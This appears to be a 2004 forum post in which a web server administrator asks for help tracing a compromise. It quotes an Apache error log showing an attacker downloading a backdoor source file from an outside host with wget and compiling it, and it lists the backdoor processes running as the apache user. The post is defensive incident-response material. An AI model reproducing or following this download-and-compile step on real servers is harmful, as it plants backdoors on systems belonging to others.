01-23-04 11:56 PM
My Related URL References:
[http://www.webhostingtalk.com/showt...threadid=169024] and
[http://www.experts-exchange.com/Sec...Q_20691048.html]
I need help identifying an unknown exploit of some kind that allowed a
remote attacker to gain control of the apache user, and compile a back door
program in the /tmp directory (
http://www.myxpls.hpg.com.br/exploit/locais/bd.c) found in error_log here:
--error_log snippet--
sh: option `-c' requires an argument
--20:06:54-- http://www.myxpls.hpg.com.br/exploit/locais/bd.c
=> `bd.c'
Resolving www.myxpls.hpg.com.br... done.
Connecting to www.myxpls.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,828 [text/plain]
0K . 100% 1.74
MB/s
20:06:54 (1.74 MB/s) - `bd.c' saved [1828/1828]
bd.c: In function `main':
bd.c:77: warning: comparison between pointer and integer
--error_log snippet--
When I stepped in the user was running the backdoor as the apache user in
memory disguised as httpd and further re-ran the backdoor program
(/tmp/localroot) and (/tmp/ptrace) shown from 'ps waux' below:
apache 32744 0.0 0.0 1364 272 ? S Jul25 0:00 ./ptrace
apache 32767 98.6 0.0 1348 288 ? R Jul25 378:36 ./localroot
apache 317 0.0 0.0 1348 296 ? S Jul25 0:00 httpd
I thought I was all about security until this happened. I was up2date,
firewalled, all services/ports not being used I've turned off, CGI suexec'd,
php_safe_mode=true, etc... before this happened.
I've looked for .bash_history files, scanned apache logs ( both SSL and
error_logs and client access_logs ), /var/log/messages, recently uploaded
client files, recently added files to the system, recently modified system
files, etc... for anomolies ( SEGFAULTs, SIGHUPs, PHP, forum board abuse ),
and compared md5sum of system binaries with uninfected systems all for
naught! The only pieces of information I have of how this exploit occurred
was in the apache error_log snippet above.
Does anyone have experience with this sort of thing?
[ Post a follow-up to this message ]
| 
